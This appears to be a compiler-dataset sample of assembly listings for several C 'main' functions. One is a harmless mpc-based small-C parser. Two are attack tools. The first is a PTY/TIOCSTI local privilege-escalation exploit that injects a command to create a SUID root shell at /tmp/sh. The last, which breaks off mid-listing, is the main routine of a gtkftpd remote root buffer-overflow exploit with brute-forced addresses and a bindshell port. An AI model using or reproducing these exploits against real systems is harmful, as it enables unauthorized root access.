.file "extr_41173.c_main_aug_v3_1.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "Usage: %s /dev/pts/X\n" .align 3 .LC1: .string "Where X is next slave device to be created\n" .align 3 .LC2: .string "[-] %s device already exists\n" .align 3 .LC3: .string "[-] fork failed\n" .align 3 .LC4: .string "[*] Waiting for slave device %s\n" .align 3 .LC5: .string "[+] Got PTY slave %s\n" .align 3 .LC6: .string "[+] Making PTY slave the controlling terminal" .align 3 .LC7: .string "cp /bin/sh /tmp/sh; chmod u+s /tmp/sh\n" .align 3 .LC8: .string "[+] SUID shell at /tmp/sh" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-48 sd s1,24(sp) sd ra,40(sp) sd s0,32(sp) sd s2,16(sp) sd s3,8(sp) sd s4,0(sp) li a5,2 mv s1,a1 beq a0,a5,.L13 lla s2,.LANCHOR0 lw a1,4(s2) ld a0,8(s1) call access@plt beq a0,zero,.L14 call fork@plt mv s3,a0 blt a0,zero,.L15 bne a0,zero,.L6 ld a1,8(s1) lla a0,.LC4 li s4,-1 call printf@plt .L7: lw a1,8(s2) ld a0,8(s1) call open@plt mv s0,a0 beq a0,s4,.L7 ld a1,8(s1) lla a0,.LC5 lla s1,.LC7 call printf@plt lla a0,.LC6 call puts@plt li a1,0 mv a0,s0 call dup2@plt li a1,1 mv a0,s0 call dup2@plt li a1,2 mv a0,s0 call dup2@plt call setsid@plt lw a1,12(s2) li a2,1 li a0,0 call ioctl@plt .L8: lw a1,16(s2) sext.w a2,s1 li a0,0 addi s1,s1,-1 call ioctl@plt lbu a5,0(s1) bne a5,zero,.L8 .L3: ld ra,40(sp) ld s0,32(sp) ld s1,24(sp) ld s2,16(sp) ld s4,0(sp) mv a0,s3 ld s3,8(sp) addi sp,sp,48 jr ra .L14: ld a2,8(s1) lw a0,0(s2) lla a1,.LC2 li s3,1 call fprintf@plt j .L3 .L13: lla s0,.LANCHOR0 ld a2,0(a1) lw a0,0(s0) lla a1,.LC0 li s3,1 call fprintf@plt lw a0,0(s0) lla a1,.LC1 call fprintf@plt j .L3 .L15: lw a0,0(s2) lla a1,.LC3 li s3,1 call fprintf@plt j .L3 .L6: li a0,0 call wait@plt lla a0,.LC8 call puts@plt li s3,0 j .L3 .size main, .-main .globl stderr .globl TIOCSTI .globl TIOCSCTTY .globl O_WRONLY .globl F_OK .bss .align 2 .set .LANCHOR0,. + 0 .type stderr, @object .size stderr, 4 stderr: .zero 4 .type F_OK, @object .size F_OK, 4 F_OK: .zero 4 .type O_WRONLY, @object .size O_WRONLY, 4 O_WRONLY: .zero 4 .type TIOCSCTTY, @object .size TIOCSCTTY, 4 TIOCSCTTY: .zero 4 .type TIOCSTI, @object .size TIOCSTI, 4 TIOCSTI: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_rlcc.c_main_aug_v3_3
.file "extr_rlcc.c_main_aug_v3_3.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "ident" .LC1: .string "number" .LC2: .string "character" .LC3: .string "string" .LC4: .string "factor" .LC5: .string "term" .LC6: .string "lexp" .LC7: .string "stmt" .LC8: .string "exp" .LC9: .string "vartype" .LC10: .string "typeident" .LC11: .string "decls" .LC12: .string "args" .LC13: .string "body" .LC14: .string "comment" .LC15: .string "linecomment" .LC16: .string "asm" .LC17: .string "procedure" .LC18: .string "cprocedure" .LC19: .string "sigdef" .LC20: .string "sigbody" .LC21: .string "includes" .LC22: .string "smallc" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC23: .ascii " ident : /[a-zA-Z_][a-zA-Z0-9_]*/ ; " .ascii " \n number : /[0-9]+/ ; " .ascii " \n character : /'.'/ ; " .ascii " \n string : /\"(\\\\.|[^\"])*\"/ ; " .ascii " \n " .ascii " \n factor : '(' <le" .ascii "xp> ')' \n |" .ascii " <number> \n " .ascii " | <character> " .ascii " \n | <string> " .ascii " \n | <ident> '(' <lexp>? (',' <lexp>)* '" .ascii ")' \n | <ident> ; " .ascii " \n " .ascii " \n term : <factor> ((" .ascii "'*' | '/' | '%') <factor>)* ; \n lexp : <te" .ascii "rm> (('+' | '-') <term>)* ; \n " .ascii " \n" .ascii " stmt : '{' <stmt>* '}' " .ascii " \n | \"while\" '(' <exp> ')' <stmt> " .ascii " \n | \"if\" '(' <exp> ')' <stmt> " .ascii " \n | <ident> '=' <lexp> ';' " .ascii " \n | \"print\" '(' <" .ascii "lexp>? ')' ';' \n | \"retur" .ascii "n\" <lexp>? ';' \n |" .ascii " <ident> '(' (<number>|<ident>|<string>)? (',' (<string>|<nu" .ascii "mber>|<ident>))* ')' ';' ; \n " .ascii " \n exp : <le" .ascii "xp> '>' <lexp> \n " .ascii " | <lexp> '<' <lexp> \n" .ascii " | <lexp> \">=\" <lexp> " .ascii " \n | <lexp> \"<=\" <lexp> " .ascii " \n | <lexp> \"!=\" <lexp> " .ascii " \n | <lexp> \"==\" <lexp> ; " .ascii " \n " .ascii " " .ascii " \n vartype : (\"int\" | \"char" .ascii "\") ; \n typeident : <vartype>" .ascii " <ident> ; \n decls : (" .ascii "<typeident> ';')* ; \n args " .ascii " : <typeident>? (',' <typeident>)* ; " .ascii "\n body : '{' <decls> <stmt>* '}' ; " .ascii " \n comment : /\\/\\*([^\\*])*\\*\\// ; " .ascii " \n linecomment : /\\/\\/([^\\n])*/ ; " .ascii " \n asm : /\\:([^\\n])*/ ; " .ascii " \n procedure : <ident> '@' \"glob" .ascii "al\" '(' <number>? ')' <body> ; \n cprocedure : <vartype> <i" .ascii "dent> '(' <args> ')' <body> ; \n sigdef : <ident> '@' <id" .ascii "ent> '(" .string "' <number> ')' ';' ; \n sigbody : '@' <ident> '(' <number> ')' ';' ; \n includes : (\"#include\" <string>)* ; \n smallc : /^/ (<comment>|<asm>|<linecomment>|<sigdef>|<sigbody>|<procedure>|<cprocedure>)* <includes> <decls> /$/ ; \n" .section .rodata.str1.1 .LC24: .string "; TAG = %s (%s)\n" .LC25: .string "<stdin>" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB1: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 movq %rsi, %r12 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 subq $200, %rsp .cfi_def_cfa_offset 256 movl %edi, 148(%rsp) leaq .LC0(%rip), %rdi movq %fs:40, %rax movq %rax, 184(%rsp) xorl %eax, %eax call mpc_new@PLT leaq .LC1(%rip), %rdi movq %rax, %r14 call mpc_new@PLT leaq .LC2(%rip), %rdi movq %rax, 8(%rsp) call mpc_new@PLT leaq .LC3(%rip), %rdi movq %rax, %r13 call mpc_new@PLT leaq .LC4(%rip), %rdi movq %rax, 16(%rsp) call mpc_new@PLT leaq .LC5(%rip), %rdi movq %rax, 24(%rsp) call mpc_new@PLT leaq .LC6(%rip), %rdi movq %rax, 32(%rsp) call mpc_new@PLT leaq .LC7(%rip), %rdi movq %rax, 40(%rsp) call mpc_new@PLT leaq .LC8(%rip), %rdi movq %rax, 48(%rsp) call mpc_new@PLT leaq .LC9(%rip), %rdi movq %rax, 56(%rsp) call mpc_new@PLT leaq .LC10(%rip), %rdi movq %rax, 64(%rsp) call mpc_new@PLT leaq .LC11(%rip), %rdi movq %rax, 72(%rsp) call mpc_new@PLT leaq .LC12(%rip), %rdi movq %rax, 80(%rsp) call mpc_new@PLT leaq .LC13(%rip), %rdi movq %rax, 88(%rsp) call mpc_new@PLT leaq .LC14(%rip), %rdi movq %rax, 96(%rsp) call mpc_new@PLT leaq .LC15(%rip), %rdi movq %rax, 104(%rsp) call mpc_new@PLT leaq .LC16(%rip), %rdi movq %rax, %rbp call mpc_new@PLT leaq .LC17(%rip), %rdi movq %rax, %r15 call mpc_new@PLT leaq .LC18(%rip), %rdi movq %rax, 112(%rsp) call mpc_new@PLT leaq .LC19(%rip), %rdi movq %rax, 120(%rsp) call mpc_new@PLT leaq .LC20(%rip), %rdi movq %rax, 128(%rsp) call mpc_new@PLT leaq .LC21(%rip), %rdi movq %rax, 152(%rsp) call mpc_new@PLT leaq .LC22(%rip), %rdi movq %rax, 136(%rsp) call mpc_new@PLT pushq $0 .cfi_def_cfa_offset 264 movq %r13, %r8 movq %r14, %rdx pushq %rax .cfi_def_cfa_offset 272 movq %rax, %rbx pushq 152(%rsp) .cfi_def_cfa_offset 280 movq 176(%rsp), %rsi pushq %rsi .cfi_def_cfa_offset 288 leaq .LC23(%rip), %rsi pushq 160(%rsp) .cfi_def_cfa_offset 296 pushq 160(%rsp) .cfi_def_cfa_offset 304 pushq 160(%rsp) .cfi_def_cfa_offset 312 pushq %r15 .cfi_def_cfa_offset 320 pushq %rbp .cfi_def_cfa_offset 328 pushq 176(%rsp) .cfi_def_cfa_offset 336 pushq 176(%rsp) .cfi_def_cfa_offset 344 pushq 176(%rsp) .cfi_def_cfa_offset 352 pushq 176(%rsp) .cfi_def_cfa_offset 360 pushq 176(%rsp) .cfi_def_cfa_offset 368 pushq 176(%rsp) .cfi_def_cfa_offset 376 pushq 176(%rsp) .cfi_def_cfa_offset 384 pushq 176(%rsp) .cfi_def_cfa_offset 392 pushq 176(%rsp) .cfi_def_cfa_offset 400 pushq 176(%rsp) .cfi_def_cfa_offset 408 movl MPCA_LANG_DEFAULT(%rip), %edi pushq 176(%rsp) .cfi_def_cfa_offset 416 movq 176(%rsp), %r9 movq 168(%rsp), %rcx call mpca_lang@PLT addq $160, %rsp .cfi_def_cfa_offset 256 testq %rax, %rax je .L2 movq %rax, %rdi movq %rax, 152(%rsp) call mpc_err_print@PLT movq 152(%rsp), %rdi call mpc_err_delete@PLT movl $1, %edi call exit@PLT .L2: cmpl $1, 148(%rsp) jle .L3 movq 8(%r12), %rdi leaq 160(%rsp), %rdx movq %rbx, %rsi call mpc_parse_contents@PLT testq %rax, %rax je .L9 movl stderr(%rip), %esi movq 168(%rsp), %rdi call mpc_ast_print_to@PLT movq 168(%rsp), %r15 cmpl $0, (%r15) jle .L5 xorl %ebp, %ebp .p2align 4,,10 .p2align 3 .L6: movq 16(%r15), %rax movq %rbp, %rdx leaq .LC24(%rip), %rdi addq $1, %rbp negq %rdx movq (%rax,%rdx,8), %r12 movl 4(%r12), %edx movl 8(%r12), %esi call eprintf@PLT movq %r12, %rdi call processNode@PLT movl %ebp, %eax negl %eax cmpl %eax, (%r15) jg .L6 movq 168(%rsp), %r15 .L5: movq %r15, %rdi call mpc_ast_delete@PLT jmp .L8 .L9: movq 160(%rsp), %rdi call mpc_err_print@PLT movq 160(%rsp), %rdi call mpc_err_delete@PLT .L8: subq $8, %rsp .cfi_def_cfa_offset 264 movq %r13, %rcx movq %r14, %rsi movl $17, %edi pushq %rbx .cfi_def_cfa_offset 272 pushq 152(%rsp) .cfi_def_cfa_offset 280 pushq 152(%rsp) .cfi_def_cfa_offset 288 pushq 152(%rsp) .cfi_def_cfa_offset 296 pushq 152(%rsp) .cfi_def_cfa_offset 304 pushq 152(%rsp) .cfi_def_cfa_offset 312 pushq 152(%rsp) .cfi_def_cfa_offset 320 pushq 152(%rsp) .cfi_def_cfa_offset 328 pushq 152(%rsp) .cfi_def_cfa_offset 336 pushq 152(%rsp) .cfi_def_cfa_offset 344 pushq 152(%rsp) .cfi_def_cfa_offset 352 pushq 152(%rsp) .cfi_def_cfa_offset 360 pushq 152(%rsp) .cfi_def_cfa_offset 368 pushq 152(%rsp) .cfi_def_cfa_offset 376 pushq 152(%rsp) .cfi_def_cfa_offset 384 movq 152(%rsp), %r9 movq 144(%rsp), %r8 movq 136(%rsp), %rdx call mpc_cleanup@PLT subq $-128, %rsp .cfi_def_cfa_offset 256 movq 184(%rsp), %rax subq %fs:40, %rax jne .L18 addq $200, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .L3: .cfi_restore_state movl stdin(%rip), %esi leaq 160(%rsp), %rcx movq %rbx, %rdx leaq .LC25(%rip), %rdi call mpc_parse_pipe@PLT testq %rax, %rax je .L9 movq 168(%rsp), %rdi call mpc_ast_print@PLT movq 168(%rsp), %rdi call mpc_ast_delete@PLT jmp .L8 .L18: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size main, .-main .globl stdin .bss .align 4 .type stdin, @object .size stdin, 4 stdin: .zero 4 .globl stderr .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .globl MPCA_LANG_DEFAULT .align 4 .type MPCA_LANG_DEFAULT, @object .size MPCA_LANG_DEFAULT, 4 MPCA_LANG_DEFAULT: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_rlcc.c_main_aug_v3_3.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "ident" .align 3 .LC1: .string "number" .align 3 .LC2: .string "character" .align 3 .LC3: .string "string" .align 3 .LC4: .string "factor" .align 3 .LC5: .string "term" .align 3 .LC6: .string "lexp" .align 3 .LC7: .string "stmt" .align 3 .LC8: .string "exp" .align 3 .LC9: .string "vartype" .align 3 .LC10: .string "typeident" .align 3 .LC11: .string "decls" .align 3 .LC12: .string "args" .align 3 .LC13: .string "body" .align 3 .LC14: .string "comment" .align 3 .LC15: .string "linecomment" .align 3 .LC16: .string "asm" .align 3 .LC17: .string "procedure" .align 3 .LC18: .string "cprocedure" .align 3 .LC19: .string "sigdef" .align 3 .LC20: .string "sigbody" .align 3 .LC21: .string "includes" .align 3 .LC22: .string "smallc" .align 3 .LC23: .ascii " ident : /[a-zA-Z_][a-zA-Z0-9_]*/ ; " .ascii " \n number : /[0-9]+/ ; " .ascii " \n character : /'.'/ ; " .ascii " \n string : /\"(\\\\.|[^\"])*\"/ ; " .ascii " \n " .ascii " \n factor : '(' <le" .ascii "xp> ')' \n |" .ascii " <number> \n " .ascii " | <character> " .ascii " \n | <string> " .ascii " \n | <ident> '(' <lexp>? (',' <lexp>)* '" .ascii ")' \n | <ident> ; " .ascii " \n " .ascii " \n term : <factor> ((" .ascii "'*' | '/' | '%') <factor>)* ; \n lexp : <te" .ascii "rm> (('+' | '-') <term>)* ; \n " .ascii " \n" .ascii " stmt : '{' <stmt>* '}' " .ascii " \n | \"while\" '(' <exp> ')' <stmt> " .ascii " \n | \"if\" '(' <exp> ')' <stmt> " .ascii " \n | <ident> '=' <lexp> ';' " .ascii " \n | \"print\" '(' <" .ascii "lexp>? ')' ';' \n | \"retur" .ascii "n\" <lexp>? ';' \n |" .ascii " <ident> '(' (<number>|<ident>|<string>)? (',' (<string>|<nu" .ascii "mber>|<ident>))* ')' ';' ; \n " .ascii " \n exp : <le" .ascii "xp> '>' <lexp> \n " .ascii " | <lexp> '<' <lexp> \n" .ascii " | <lexp> \">=\" <lexp> " .ascii " \n | <lexp> \"<=\" <lexp> " .ascii " \n | <lexp> \"!=\" <lexp> " .ascii " \n | <lexp> \"==\" <lexp> ; " .ascii " \n " .ascii " " .ascii " \n vartype : (\"int\" | \"char" .ascii "\") ; \n typeident : <vartype>" .ascii " <ident> ; \n decls : (" .ascii "<typeident> ';')* ; \n args " .ascii " : <typeident>? (',' <typeident>)* ; " .ascii "\n body : '{' <decls> <stmt>* '}' ; " .ascii " \n comment : /\\/\\*([^\\*])*\\*\\// ; " .ascii " \n linecomment : /\\/\\/([^\\n])*/ ; " .ascii " \n asm : /\\:([^\\n])*/ ; " .ascii " \n procedure : <ident> '@' \"glob" .ascii "al\" '(' <number>? ')' <body> ; \n cprocedure : <vartype> <i" .ascii "dent> '(' <args> ')' <body> ; \n sigdef : <ident> '@' <id" .ascii "ent> '(" .string "' <number> ')' ';' ; \n sigbody : '@' <ident> '(' <number> ')' ';' ; \n includes : (\"#include\" <string>)* ; \n smallc : /^/ (<comment>|<asm>|<linecomment>|<sigdef>|<sigbody>|<procedure>|<cprocedure>)* <includes> <decls> /$/ ; \n" .align 3 .LC24: .string "; TAG = %s (%s)\n" .align 3 .LC25: .string "<stdin>" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-432 la a4,__stack_chk_guard mv a5,a0 sd a5,256(sp) lla a0,.LC0 ld a5, 0(a4) sd a5, 312(sp) li a5, 0 sd ra,424(sp) sd a1,280(sp) sd s0,416(sp) sd s1,408(sp) sd s2,400(sp) sd s3,392(sp) sd s4,384(sp) sd s5,376(sp) sd s6,368(sp) sd s7,360(sp) sd s8,352(sp) sd s9,344(sp) sd s10,336(sp) sd s11,328(sp) call mpc_new@plt mv s1,a0 lla a0,.LC1 call mpc_new@plt mv s2,a0 lla a0,.LC2 call mpc_new@plt mv s3,a0 lla a0,.LC3 call mpc_new@plt mv s4,a0 lla a0,.LC4 call mpc_new@plt mv s5,a0 lla a0,.LC5 call mpc_new@plt mv s6,a0 lla a0,.LC6 call mpc_new@plt mv s7,a0 lla a0,.LC7 sd s7,152(sp) call mpc_new@plt mv a5,a0 lla a0,.LC8 sd a5,160(sp) call mpc_new@plt mv a5,a0 lla a0,.LC9 sd a5,168(sp) call mpc_new@plt mv a5,a0 lla a0,.LC10 sd a5,176(sp) call mpc_new@plt mv a5,a0 lla a0,.LC11 sd a5,184(sp) call mpc_new@plt mv a5,a0 lla a0,.LC12 sd a5,192(sp) call mpc_new@plt mv a5,a0 lla a0,.LC13 sd a5,200(sp) call mpc_new@plt mv a5,a0 lla a0,.LC14 sd a5,208(sp) call mpc_new@plt mv a5,a0 lla a0,.LC15 sd a5,216(sp) call mpc_new@plt mv a5,a0 lla a0,.LC16 sd a5,272(sp) call mpc_new@plt mv a4,a0 lla a0,.LC17 sd a4,264(sp) call mpc_new@plt mv a3,a0 lla a0,.LC18 sd a3,224(sp) call mpc_new@plt mv s8,a0 lla a0,.LC19 sd s8,232(sp) call mpc_new@plt mv s9,a0 lla a0,.LC20 sd s9,240(sp) call mpc_new@plt mv s7,s8 mv s8,a0 lla a0,.LC21 call mpc_new@plt mv s10,a0 lla a0,.LC22 sd s10,248(sp) call mpc_new@plt ld a4,224(sp) lla s11,.LANCHOR0 mv s0,a0 lw a0,0(s11) sd a4,88(sp) ld a4,264(sp) ld a5,272(sp) mv a7,s6 sd a4,80(sp) ld a4,216(sp) sd a5,72(sp) ld a5,160(sp) sd a4,64(sp) ld a4,208(sp) sd a5,8(sp) ld a5,152(sp) sd a4,56(sp) ld a4,200(sp) sd a5,0(sp) mv a6,s5 sd a4,48(sp) ld a4,192(sp) mv a5,s4 mv a3,s2 sd a4,40(sp) ld a4,184(sp) mv a2,s1 lla a1,.LC23 sd a4,32(sp) ld a4,176(sp) sd s7,96(sp) sd zero,136(sp) sd a4,24(sp) ld a4,168(sp) sd s0,128(sp) sd s10,120(sp) sd a4,16(sp) mv a4,s3 sd s8,112(sp) sd s9,104(sp) call mpca_lang@plt beq a0,zero,.L2 mv s8,a0 call mpc_err_print@plt mv a0,s8 call mpc_err_delete@plt li a0,1 call exit@plt .L2: ld a4,256(sp) li a5,1 ble a4,a5,.L3 ld a5,280(sp) addi a2,sp,296 mv a1,s0 ld a0,8(a5) call mpc_parse_contents@plt beq a0,zero,.L9 lw a1,4(s11) ld a0,304(sp) call mpc_ast_print_to@plt ld s8,304(sp) lw a5,0(s8) ble a5,zero,.L5 li s10,0 li s9,0 lla s11,.LC24 .L6: ld a5,16(s8) mv a0,s11 addiw s9,s9,-1 add a5,a5,s10 ld s7,0(a5) addi s10,s10,-8 lw a2,4(s7) lw a1,8(s7) call eprintf@plt mv a0,s7 call processNode@plt lw a5,0(s8) bgt a5,s9,.L6 ld s8,304(sp) .L5: mv a0,s8 call mpc_ast_delete@plt j .L8 .L9: ld a0,296(sp) call mpc_err_print@plt ld a0,296(sp) call mpc_err_delete@plt .L8: ld a5,248(sp) ld a7,152(sp) mv a4,s4 sd a5,88(sp) ld a5,240(sp) mv a6,s6 mv a3,s3 sd a5,80(sp) ld a5,232(sp) mv a2,s2 mv a1,s1 sd a5,72(sp) ld a5,224(sp) li a0,17 sd s0,96(sp) sd a5,64(sp) ld a5,216(sp) sd a5,56(sp) ld a5,208(sp) sd a5,48(sp) ld a5,200(sp) sd a5,40(sp) ld a5,192(sp) sd a5,32(sp) ld a5,184(sp) sd a5,24(sp) ld a5,176(sp) sd a5,16(sp) ld a5,168(sp) sd a5,8(sp) ld a5,160(sp) sd a5,0(sp) mv a5,s5 call mpc_cleanup@plt la a5,__stack_chk_guard ld a4, 312(sp) ld a5, 0(a5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L18 ld ra,424(sp) ld s0,416(sp) ld s1,408(sp) ld s2,400(sp) ld s3,392(sp) ld s4,384(sp) ld s5,376(sp) ld s6,368(sp) ld s7,360(sp) ld s8,352(sp) ld s9,344(sp) ld s10,336(sp) ld s11,328(sp) li a0,0 addi sp,sp,432 jr ra .L3: lw a1,8(s11) addi a3,sp,296 mv a2,s0 lla a0,.LC25 call mpc_parse_pipe@plt beq a0,zero,.L9 ld a0,304(sp) call mpc_ast_print@plt ld a0,304(sp) call mpc_ast_delete@plt j .L8 .L18: call __stack_chk_fail@plt .size main, .-main .globl stdin .globl stderr .globl MPCA_LANG_DEFAULT .bss .align 2 .set .LANCHOR0,. + 0 .type MPCA_LANG_DEFAULT, @object .size MPCA_LANG_DEFAULT, 4 MPCA_LANG_DEFAULT: .zero 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .type stdin, @object .size stdin, 4 stdin: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_88.c_main_aug_v3_6
.file "extr_88.c_main_aug_v3_6.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "downward" .LC1: .string "upward" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC2: .string "[*] gtkftpd[v1.0.4(and below)]: remote root buffer overflow exploit.\n[*] by: vade79/v9 [email protected] (fakehalo)\n" .section .rodata.str1.1 .LC3: .string "COLUMNS" .section .rodata.str1.8 .align 8 .LC4: .string "main(): allocating memory failed." .section .rodata.str1.1 .LC5: .string "%x" .LC6: .string "h:P:s:u:p:c:b:a:n:rd" .section .rodata.str1.8 .align 8 .LC7: .string "[!] shell port defined contains null byte(s), using default." .align 8 .LC8: .string "[*] target: %s:%d, identity: %s:%s.\n[*] directory: %s, brute start: 0x%.8x, alignment: %d.\n[*] memory direction: %s, attempts: %d, bindshell port: %d.\n\n" .align 8 .LC9: .string "brute force exhausted, failed." .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 leaq .LC3(%rip), %r12 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 movl %edi, %ebp leaq .LC2(%rip), %rdi pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 movq %rsi, %rbx subq $8, %rsp .cfi_def_cfa_offset 64 call puts@PLT movq %r12, %rdi call getenv@PLT testq %rax, %rax jne .L49 .L2: leaq .LC6(%rip), %r13 leaq .L6(%rip), %r12 leaq baseaddr(%rip), %r15 leaq .LC5(%rip), %r14 .p2align 4,,10 .p2align 3 .L3: movq %r13, %rdx movq %rbx, %rsi movl %ebp, %edi call getopt@PLT cmpl %eax, EOF(%rip) je .L50 subl $80, %eax cmpl $37, %eax ja .L4 movslq (%r12,%rax,4), %rax addq %r12, %rax notrack jmp *%rax .section .rodata .align 4 .align 4 .L6: .long .L16-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L15-.L6 .long .L14-.L6 .long .L13-.L6 .long .L12-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L11-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L10-.L6 .long .L4-.L6 .long .L9-.L6 .long .L4-.L6 .long .L8-.L6 .long .L7-.L6 .long .L4-.L6 .long .L5-.L6 .section .text.startup .p2align 4,,10 .p2align 3 .L4: movq (%rbx), %rdi call usage@PLT jmp .L3 .p2align 4,,10 .p2align 3 .L5: cmpq $0, user(%rip) jne .L3 movq optarg(%rip), %rdi call strdup@PLT movq %rax, user(%rip) testq %rax, %rax jne .L3 .L20: movl $1, %esi leaq .LC4(%rip), %rdi call printe@PLT jmp .L3 .p2align 4,,10 .p2align 3 .L7: movq optarg(%rip), %rdi call atoi@PLT movl %eax, sport(%rip) jmp .L3 .p2align 4,,10 .p2align 3 .L8: movl $1, reverse(%rip) jmp .L3 .p2align 4,,10 .p2align 3 .L9: cmpq $0, pass(%rip) jne .L3 movq optarg(%rip), %rdi call strdup@PLT movq %rax, pass(%rip) testq %rax, %rax jne .L3 jmp .L20 .p2align 4,,10 .p2align 3 .L10: movq optarg(%rip), %rdi call atoi@PLT movl %eax, attempts(%rip) jmp .L3 .p2align 4,,10 .p2align 3 .L11: cmpq $0, host(%rip) jne .L3 movq optarg(%rip), %rdi call strdup@PLT movq %rax, host(%rip) testq %rax, %rax jne .L3 jmp .L20 .p2align 4,,10 .p2align 3 .L12: movl $1, no_io(%rip) jmp .L3 .p2align 4,,10 .p2align 3 .L13: cmpq $0, writedir(%rip) jne .L3 movq optarg(%rip), %rdi call strdup@PLT movq %rax, writedir(%rip) testq %rax, %rax jne .L3 jmp .L20 .p2align 4,,10 .p2align 3 .L14: movq optarg(%rip), %rdi movq %r15, %rdx movq %r14, %rsi call sscanf@PLT jmp .L3 .p2align 4,,10 .p2align 3 .L15: movq optarg(%rip), %rdi call atoi@PLT movl %eax, align(%rip) jmp .L3 .p2align 4,,10 .p2align 3 .L16: movq optarg(%rip), %rdi call atoi@PLT movl %eax, port(%rip) jmp .L3 .p2align 4,,10 .p2align 3 .L50: cmpq $0, host(%rip) je .L51 .L22: cmpq $0, user(%rip) je .L52 .L23: cmpq $0, pass(%rip) je .L53 .L24: cmpq $0, writedir(%rip) je .L54 .L25: movl baseaddr(%rip), %ecx testl %ecx, %ecx jne .L26 movl DFLADDR(%rip), %eax movl %eax, baseaddr(%rip) .L26: cmpl $3, align(%rip) jle .L27 movl $2, align(%rip) .L27: movl sport(%rip), %eax testb $-1, %ah je .L28 testb %al, %al jne .L29 .L28: leaq .LC7(%rip), %rdi call puts@PLT movl $7979, %eax movl $7979, sport(%rip) .L29: movq x86_exec(%rip), %rdx movzbl %ah, %ecx movq writedir(%rip), %r9 leaq .LC8(%rip), %rdi movq pass(%rip), %r8 movq host(%rip), %rsi movl %ecx, 80(%rdx) movzbl %al, %ecx movl %ecx, 84(%rdx) movl reverse(%rip), %edx leaq .LC1(%rip), %rcx testl %edx, %edx leaq .LC0(%rip), %rdx cmovne %rcx, %rdx subq $8, %rsp .cfi_def_cfa_offset 72 movq user(%rip), %rcx pushq %rax .cfi_def_cfa_offset 80 movl attempts(%rip), %eax pushq %rax .cfi_def_cfa_offset 88 movl align(%rip), %eax pushq %rdx .cfi_def_cfa_offset 96 movl port(%rip), %edx pushq %rax .cfi_def_cfa_offset 104 movl baseaddr(%rip), %eax pushq %rax .cfi_def_cfa_offset 112 xorl %eax, %eax call printf@PLT movl sig_ctrlc(%rip), %esi movl SIGINT(%rip), %edi addq $48, %rsp .cfi_def_cfa_offset 64 call signal@PLT movl sig_pipe(%rip), %esi movl SIGPIPE(%rip), %edi call signal@PLT xorl %eax, %eax call ftp_connect@PLT xorl %esi, %esi leaq .LC9(%rip), %rdi call printe@PLT xorl %edi, %edi call exit@PLT addq $8, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .L49: .cfi_restore_state movq %r12, %rdi call getenv@PLT movq %rax, %rdi call atoi@PLT movl %eax, columns(%rip) jmp .L2 .L54: movq DFLDIR(%rip), %rax movq %rax, writedir(%rip) jmp .L25 .L53: movq DFLPASS(%rip), %rax movq %rax, pass(%rip) jmp .L24 .L52: movq DFLUSER(%rip), %rax movq %rax, user(%rip) jmp .L23 .L51: movq (%rbx), %rdi call usage@PLT jmp .L22 .cfi_endproc .LFE0: .size main, .-main .globl x86_exec .bss .align 8 .type x86_exec, @object .size x86_exec, 8 x86_exec: 